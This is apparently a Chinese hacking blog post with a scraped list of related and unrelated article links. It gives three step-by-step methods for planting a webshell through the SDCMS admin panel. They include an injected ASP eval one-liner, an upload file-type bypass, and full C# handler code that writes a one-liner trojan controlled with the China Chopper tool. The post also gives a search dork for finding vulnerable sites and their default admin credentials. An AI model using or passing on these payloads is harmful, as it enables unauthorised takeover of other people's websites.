第一种方法

进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为   "%><%eval request("80lr")'    //密码为80lr
用菜刀链接http://www.80lr.com/inc/const.asp  就搞定了。

第二种方法

进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!

第三种方法

进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
内容写入下面内容:
/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"80lr\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
/=============================================/
访问这个地址:http://www.80lr.com/skins/2009/getshell.ashx 
会在http://www.80lr.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为80lr 用菜刀链接

送上关键词:intitle:"Powered By SDCMS"
后台http://www.80lr.com/admin/   默认用户和密码:sdcms
本文来自易寒网络,转载务必注明原文链接:http://www.80lr.com/oday/241.html

SDcms后台拿webshell相关推荐

  1. 后台拿webshell的常用方法总结

    时间:2014-04-16 11:22 来源:阳光在线下载 标签:js6899.com 一.直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直 ...

  2. 后台拿webshell的方法总结

    刚看到的文章,觉得还不比较全,可能有些朋友已经看过了,不过我还是在这分享下吧,省得大家去找... 一.直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其 ...

  3. 后台得到webshell方法大汇总

    动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常费了九牛 ...

  4. 网站后台拿webshell

    当我们通过一些漏洞进入后台之后就要想办法获取网站的控制权限,就是我们所说的拿webshell,这样就可以对网站进行任意编辑,一般都是通过漏洞向目标服务器写入一句话木马来getshell 根据语言的不同 ...

  5. 从后台得到webshell十大技巧大汇总(转)

    在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外.因此,我们把常用的从后台得 ...

  6. 从后台得到webshell技巧大汇总

    前 言 动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常 ...

  7. 从后台得到webshell十大技巧大汇总

    前 言 动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常 ...

  8. 从后台得到webshell

    前 言 动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除 一些小网站仍然存在此漏洞.在拿站过程中,我们经 ...

  9. 网站后台服务器脚本,后台get webshell的方法

    一.直接得到webshell 有些网站后台为了方便,可以直接写入脚本文件,对此可以直接写入webshell 二.利用数据库备份 方法老掉牙了.现在数据库备份一般都写死了. 上传有限制,只能上传图片格式 ...

最新文章

  1. Winrar目录穿越漏洞复现
  2. RabbitMQ简介以及应用
  3. OGEngine_粒子效果
  4. pepflashplayer32_25_0_0_127.dll: 0x59952C6D is not a valid instance ID.
  5. CentOS 7磁盘分区及文件系统管理
  6. spring mvc学习(2):spring jar包下载
  7. es6 初级之箭头函数
  8. 苹果被曝寻求收购Drive.ai:吴恩达参与运营,多家中国VC投资
  9. 首届 “女生科技体验节” 大爆料!
  10. 初学者上手python建模
  11. 模糊控制洗衣机MATLAB模型,洗衣机的模糊控制MATLAB仿真
  12. 深度多模态子空间聚类网络+代码实现
  13. 五大主流浏览器和内核
  14. 互联网赚钱的逻辑是什么?
  15. 京剧《赤壁》舌战群儒
  16. ArcGIS坡度分析(解决坡度分析80-89°高值居多)
  17. 阿里达摩院获KDD 2022最佳论文,国内企业首次获奖
  18. python 输出\xhh格式的16进制数据(改2)
  19. x=1u c语言,c语言中1u是什么意思
  20. 西门子et200 分布式i/o_西门子ET 200简介

热门文章

  1. 荣耀手机在HBuilderX中运行uni-app真机测试检测不到设备的解决方案
  2. 基于Qt的jpg、png图片批处理成svg图工具
  3. 微课 | 中台战略专题教案 附下载
  4. 南师大计算机科学在全国的排名,2017南京师范大学全国排名
  5. models.py 文件中的类及相关属性
  6. 皮尔逊相关系数(Pearson Correlation Coefficient, Pearson's r)
  7. Spring Boot配置绑定
  8. 是时候再来推荐一波Android 黑科技工具了
  9. 教育部:不得将研究生当作廉价劳动力!
  10. 好消息,(欢迎大家积极参与) * 贺新年 * 中大礼 * 华章图书 联手 W3CHINA 举办有奖调查、幸运获书活动!...